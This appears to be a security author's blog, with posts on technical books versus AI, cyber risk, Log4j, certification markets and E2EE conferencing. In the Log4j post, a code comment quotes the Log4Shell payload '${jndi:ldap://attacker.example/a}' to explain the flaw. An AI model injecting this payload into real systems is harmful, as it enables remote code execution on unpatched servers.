Do we still need technical reference books?

Given that AI tools like ChatGPT can generate texts on the fly, one may wonder whether we still need technical reference books (which take a long time to produce), or whether they have become obsolete. As a book series editor and author, this question directly affects me and the prioritization of my work.

First, I want to draw a distinction between knowledge and understanding:

  • Knowledge is the ability to recall information stored somewhere. In the case of human beings, such information is acquired through education and experience (in addition to information that is already present at birth). In any case, the information is stored in some form of memory and can later be retrieved from there.
  • Understanding, on the other hand, not only requires knowledge, but also deepens it in terms of causes, meanings, interpretations, and implications. This is obviously more than information storage and retrieval, but it is difficult to specify and nail down precisely.

What IT and currently deployed AI technologies are good at is knowledge handling, i.e., information storage and retrieval, and the simulation of understanding. This simulation paradigm is at the core of the Turing test, which has always been the benchmark for AI technologies (we are still looking for an alternative and maybe even better way to characterize intelligent machine behavior). In any case, whether a machine is really able to understand is mainly a philosophical question and beyond the scope of this post.

Second, I want to use the terms “knowledge” and “understanding” to answer the title question. I assume that the purpose of a technical reference book is to provide knowledge and understanding of a particular field of study. Knowledge can easily be provided artificially (there is no need for technical reference books here), but the provision of understanding is more involved and subtle. I firmly believe that somebody who does not understand a particular topic cannot convey that understanding to others. As AI technologies are good at simulating understanding of a topic without really understanding it, I think that a good technical reference book cannot be generated artificially (e.g., through AI technologies). In this context, “good” refers to a book written by an authoritative person, i.e., somebody who knows and deeply understands the subject matter. If somebody wants to get into a topic, there is simply no alternative to a good technical reference book. Consequently, the title question must be answered in the affirmative. There are, however, two caveats:

  • On the one hand, the positive assessment only applies to the first technical reference books written on a particular topic. As soon as there are several books, the AI machinery of copying and pasting text segments (maybe even modifying them to circumvent copyright infringement) may work and serve the same purpose.
  • On the other hand, the positive assessment not only applies to technical reference books, but also to other forms of knowledge and understanding transfer, such as overview articles, podcasts, audio books, learning videos, or whatever comes next.

Against this background, I think that it is still useful to invest in technical reference books – either on the producing or the consuming side – and that the value of good books cannot be overestimated. This insight is reassuring for my work, and I therefore continue it with a clear conscience.


Signal Protocol in 1 Slide


E2EE Messaging in 1 Slide


Cyber Risk Management

A short article (column) entitled “How To Manage Cyber Risks – Lessons Learnt from Medical Science” will appear in the January 2023 issue of the IEEE Computer magazine. The article is co-authored by Andreas Grünert, and it continues some lines of thought that have their roots in a 2015 article in the IEEE Security & Privacy magazine (entitled “Quantitative Risk Analysis in Information Security Management: A Modern Fairy Tale”) and a 2017 guest editors’ introduction to an IEEE Computer magazine special issue on risk management (entitled “New Frontiers: Assessing and Managing Security Risks” and co-authored by Günther Pernul and Sokratis Katsikas). The forthcoming article explains why cyber risk management based on a threats-and-vulnerabilities analysis doesn’t work in the field, and how cyber risks can be managed instead. The suggested approach is conceptually related to medical science and the way a doctor typically manages the risks to his or her patients’ health. There are many things that can be learnt from this analogy.


Lessons learnt from Log4j

The recent Log4j turmoil has revealed severe problems and structural difficulties in the way we develop and market software. Very frequently, open source software components, like the Log4j library, are built into larger software products and may even become integral – but highly invisible – parts of critical applications. People hope that Linus’s law that “given enough eyeballs, all bugs are shallow” applies, whereas in reality it does not – at least not in absolute terms. In fact, I would argue that all (non-trivial) software components comprise bugs, and there is hardly anything that can be done about it. In particular, this fact is independent of the economic model of software development; it equally applies to open source and proprietary software. Its openness does not magically make software more secure. The “many eyeballs” that may find bugs do not necessarily look for them; bug-finding processes tend not to be at the top of software developers’ priority lists. They prefer to spend their time on more interesting and challenging tasks, like implementing new features and functions. This means that some (subtle) bugs still prevail, and Log4j is no exception here.
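To make the structural point concrete: the Log4Shell vulnerability (CVE-2021-44228) was triggered by something as innocuous as logging attacker-controlled input. The following minimal Java sketch (class, method, and variable names are hypothetical) illustrates the pattern; in Log4j versions 2.0 through 2.14.1, message lookups were enabled by default, so a crafted string in the logged value could make the library fetch and execute remote code:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical servlet-style handler; only the logging call matters here.
public class LoginHandler {
    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    void handleLogin(String userAgent) {
        // Looks harmless, but in Log4j 2.0-2.14.1 a User-Agent header such as
        //   ${jndi:ldap://attacker.example/a}
        // was interpreted as a lookup, causing a remote JNDI/LDAP fetch and
        // potentially remote code execution (CVE-2021-44228).
        logger.info("Login attempt, User-Agent: {}", userAgent);
    }
}
```

Nobody who merely used a product with Log4j buried somewhere in its dependency tree had any reason to suspect that an innocent log statement could behave this way – which is exactly the invisibility problem described above.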

The most obvious lesson learnt from Log4j is that every software component is important from a security perspective. You cannot build secure software on top of insecure components. If a component is built into a product, then it is important that this component is as secure as the other components. Otherwise, it will become the weak link that breaks the entire system. Another – maybe less obvious – lesson is that it is not primarily about creating software; rather, it is about maintaining and steadily improving it. This must be a professional activity that needs to be funded in some way. This is well understood in companies that develop and sell proprietary software; it is less well understood in other circles. Without funding, open source software will suffer the tragedy of the commons and not be maintained and improved professionally. This means that old bugs (or features) – however shallow they may be in principle – will still hit us badly. The Log4j story will be continued soon (starring another software component); stay tuned.


Can a Lemon Market Remedy a Lemon Market?

It is commonly agreed that the market for cybersecurity products and services is what economists call a lemon market (according to the 1970 work of the economist George Akerlof, who jointly received the prestigious Nobel Memorial Prize in Economic Sciences with Michael Spence and Joseph Stiglitz in 2001), and people sometimes argue that certification may remedy the situation.

In this note, I contradict this argument, mainly because the market for certificates is itself a lemon market. So the key question is: Can we remedy a lemon market by putting in place another lemon market, or do we need something else? To reasonably argue about this question, one has to first look at the market for certificates as it stands today.

Since the early 1980s, people have tried to define criteria to evaluate and certify the security of computer systems used for the processing, storage, and retrieval of sensitive or even classified information. In 1983, for example, the U.S. Department of Defense (DoD) released the Trusted Computer System Evaluation Criteria (TCSEC), frequently referred to as the Orange Book. In 1991, the European Commission published the Information Technology Security Evaluation Criteria (ITSEC), based on previous work done in Germany, France, the United Kingdom, and the Netherlands. These and a few other initiatives finally culminated in the Common Criteria (CC), which refer to internationally agreed and standardized criteria to evaluate and certify the security of computer systems. Unfortunately, the CC are not self-contained, meaning that every nontrivial set of functionalities requires a protection profile (PP), against which the CC can be applied. These PPs are usually defined by the largest manufacturers in the respective field, and hence they tend to be somewhat biased towards what the leading products can do. Also, certificates issued in the context of a CC PP are usually hard for customers to understand. The situation is far from mature and satisfactory for both manufacturers and customers.

A similar lack of maturity applies to certificates issued for information security management systems (ISMS) according to ISO/IEC 27001. Such systems can be customized and fine-tuned through their scopes and statements of applicability, and hence one has to look closely at what an ISO/IEC 27001 certificate actually stands for. It does not necessarily stand for best practices and a reasonable level of security in all cases. As is usually the case in security, the devil is in the details.

For all types of certificates that are currently on the market, including the CC and ISO/IEC 27001, the owner of the certificate pays for the evaluation and certification processes carried out by some accredited body. This is expensive and time-consuming. Consequently, almost all actors go for a body that is minimally invasive, and the body that makes the best offer usually wins the competition. This means that the market is driven by pricing, and that low-priced offerings are always preferred. This is exactly how a lemon market works and how it downgrades quality in the long term.

The bottom line is that we have a lemon market for cybersecurity products and services that we want to remedy with another lemon market for certificates. This is not going to work. The manufacturers of low-security products and services are always going to find a body that takes a loose stance and doesn’t really question the security promises of the products and services it looks at. Such a body will find something (it has to, because it is paid for it), and everybody is happy as long as the findings are not too embarrassing. Even the customers like a positive statement in favor of security. The economic incentives are not going to change unless the customers pay for the evaluation and certification. This, however, is illusory and not going to happen. So we have to live with the situation that security certificates are neither expressive nor particularly useful, and we have to find other means to convince ourselves of the security of a product or service. This is not simple, but it is needed in the field.


Is E2EE Conferencing Meaningful?

These days, my new book entitled End-to-End Encrypted Messaging is being printed and prepared for shipping. Due to this fact, but mainly due to the Corona crisis, I am often asked whether the various conferencing tools that are used worldwide, such as Zoom and Microsoft Teams, are reasonably secure and adhere to the state of the art. The short answer is “no,” but it makes a lot of sense to scrutinize both the question and the answer.

With regard to the question, the first counterquestion I would ask is why one would want to encrypt a conference in the first place, especially if the conference has many participants. Remember the famous quote attributed to Benjamin Franklin: “Three may keep a secret, if two of them are dead.” It seems exaggerated, but the bottom line is still that keeping a secret becomes increasingly difficult the more people have to share it. One may argue about the threshold, and the quote is overly pessimistic here, but beyond only a handful of persons it seems very unlikely that a secret can ever be kept. This, in turn, means that secure – maybe even E2EE – conferencing is meaningful for small groups, but certainly becomes more and more pointless the larger the group is. Note that any group member can tape the audio and/or video streams and redistribute them at will. If we are talking about dozens, hundreds, or even thousands of participants in a large conference, then encrypting it may be a nice engineering exercise, but its actual value may be small. The information is going to leak anyway, even if it is end-to-end encrypted. This insight is just a consequence of human behavior and its (in)ability to keep secrets.
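To put a rough number on this intuition, consider a minimal (and admittedly simplistic) model in which each of the n participants independently leaks the content with some small probability p. The probability that the secret leaks at least once is then

```latex
\Pr[\text{leak}] \;=\; 1 - (1 - p)^{n}
```

With hypothetical numbers, say p = 0.05 and n = 50 participants, this already yields 1 − 0.95^50 ≈ 0.92, i.e., a leak is almost certain. Encryption does not enter this calculus at all – it protects the channel, not the people at its endpoints.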

With regard to the answer, I am more optimistic. In spite of the fact that most conferencing tools are not truly end-to-end encrypting and sometimes have even devastating shortcomings (e.g., Zoom seemingly encrypting with AES-128 in ECB mode), cryptographic research has come up with E2EE protocols that are highly secure and continuously refresh their keying material, such as the Signal protocol that is also used in WhatsApp, Facebook Messenger, and many more. This protocol is optimized for the asynchronous setting, but it works equally well in the simpler, synchronous setting of a conference. Some messengers are already using this protocol for small-group conferencing (e.g., WhatsApp for groups of up to 4 members). Furthermore, the community (in particular the IETF MLS WG) is working on a messaging layer security (MLS) protocol that is particularly well suited for large groups with thousands of members. This protocol can be used for E2EE messaging, but it can also be used for E2EE conferencing. So from a technical perspective, the problem of how to implement E2EE messaging and conferencing in a scalable way seems to be solved. The remaining question is how reasonable and meaningful it is to end-to-end encrypt large conferences. My personal impression is that secret information should not be discussed in large conferences, and hence currently deployed messengers (which support groups of up to a few members) are sufficient here.
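To give a flavor of what “refreshing the keying material” means, the following Java sketch implements a symmetric KDF chain (hash ratchet), the building block the Signal protocol specification uses to derive a fresh message key for every single message. The derivation constants 0x01 and 0x02 follow the published Signal specification; everything else is a simplified illustration under that assumption, not the actual implementation:

```java
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Simplified symmetric ratchet: each step derives a one-time message key
// and immediately replaces the chain key, so that compromising the current
// state does not reveal the keys of earlier messages (forward secrecy).
public final class SymmetricRatchet {
    private byte[] chainKey;

    public SymmetricRatchet(byte[] initialChainKey) {
        this.chainKey = initialChainKey.clone();
    }

    // Derive the next message key and advance the chain key.
    public byte[] nextMessageKey() throws Exception {
        byte[] messageKey = hmacSha256(chainKey, new byte[] {0x01});
        chainKey = hmacSha256(chainKey, new byte[] {0x02}); // old key is gone
        return messageKey;
    }

    private static byte[] hmacSha256(byte[] key, byte[] data) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(data);
    }
}
```

Contrast this with a single static AES key in ECB mode: there, one compromised key exposes all past and future traffic, and identical plaintext blocks even produce identical ciphertext blocks.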

If you still want to use an E2EE conferencing tool, then it makes sense to study the details. As is usually the case in security, the devil is in the details, and the details make the difference. In times like today, marketing departments are good at putting together various buzzwords and acronyms (like E2EE) to make product sheets as interesting and promising as possible. It is therefore important to stay critical and ask the right questions. E2EE conferencing may not be the appropriate solution in all situations.


New Book Released Soon

My new book about secure and end-to-end encrypted (E2EE) messaging will be released soon. It addresses E2EE messaging protocols, like OpenPGP and S/MIME, as well as OTR, Signal, iMessage, Wickr, Threema, Telegram, and many more. The core of the book is the Signal protocol, which represents the state of the art in E2EE messaging as it stands today. Besides the Signal messenger, it is also used in WhatsApp, Viber, Wire, and the Facebook Messenger. The book can be ordered from Artech House UK or US.


Intelligence-Driven Cyber Defense

In a 2015 article, I argued that conventional wisdom in information security management is deeply flawed, because it requires a risk-based approach while knowing full well that any form of risk analysis – be it quantitative or qualitative – is somewhat arbitrary and therefore largely useless. In spite of this argument, most information security officers and managers still continue to ask for compliance and audits (some organizations have even turned their information security officer into a compliance manager). Most efforts spent on information security management are therefore wasted, meaning that the respective labor is Sisyphean.

In this post, I want to continue this line of argumentation by proposing something that may replace risk-based information security management sometime in the future. For lack of a better term, I call it intelligence-driven (instead of “risk-based”) cyber defense (instead of “information security management”).

  • The first part of the term should make it clear that any form of risk analysis is better replaced with intelligence, meaning that information security can only be achieved if one knows what is going on in a particular information technology (IT) infrastructure. Without this knowledge, one is blind and doomed to fail. Intelligence is key to anything related to security.
  • The second part of the term should make it clear that cybersecurity takes place in a game-theoretic setting, in which there is an offense – represented by the adversaries – and a defense. A security professional’s job is to defend the IT infrastructure of his or her employer, i.e., to make sure that no adversary is able to successfully mount an attack. This job is very comparable to a defender’s job in a soccer team. It doesn’t matter whether the next offensive is launched by a wing player or the center forward; a good defense must mitigate either of them. There is no use in arguing about probabilities: if an opposing team attacks through the center forward most of the time, this does not mean that the defense can count on that and forget about the wing players in the next offensive. Instead, a good defense must be prepared for anything, independently of any probability, and it must be able to react dynamically and situationally. The same line of thinking applies in cybersecurity: it is mainly about mitigating all possible attacks.

Putting the parts together, I think that future information security management needs to be intelligence-driven, and that the ultimate goal must be to set up a solid and profound cyber defense. It goes without saying that this requires a major change of mindset in future generations of information security professionals. We have to move away from risk analysis towards mechanisms and tools that allow us to gather as much intelligence as possible and to use it properly and wisely. We also have to take the stance of a good defense: be prepared for anything, even if it is highly unlikely.


CALL FOR QUESTIONS

CRYPTOlog

I have added a cryptology blog named CRYPTOlog to the Web site of eSECURITY Technologies Rolf Oppliger (cryptolog.esecurity.ch). The aim is to answer questions related to cryptology that are of common interest. I am looking forward to receiving many interesting questions to answer.
